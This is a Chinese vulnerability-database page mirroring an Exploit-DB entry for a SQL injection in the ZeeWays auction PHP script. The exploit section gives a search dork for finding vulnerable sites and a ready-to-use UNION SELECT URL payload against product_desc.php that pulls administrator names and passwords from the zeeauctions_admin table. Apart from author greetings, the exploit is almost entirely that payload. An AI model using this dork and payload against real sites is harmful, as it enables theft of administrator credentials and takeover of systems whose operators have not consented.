ZeeWays Script - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058964 漏洞类型
发布时间 2010-01-10 更新时间 2010-01-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11087
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: ZeEwAyS ScRiPt SQL Injection Vulnerability
# Author: SyRiAn_34G13
# Mail : sy34@msn.com
.............................................................

# Software Link: [downoad link if available]

.............................................................

# Version:

.............................................................

# Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com ]

.............................................................

# Tested on: Apache/2.2.11

.............................................................

# Demo : http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--

.............................................................

# ExPlOiT : product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--

.............................................................

# Thanx : My Brothers ~~~SyRiAn_SnIpEr~~~~SyRiAn_SpIdEr
My Love ~~F~~

.............................................................
I Love You ~~~~~~~~~~~SyRiA~~~~~~~~~~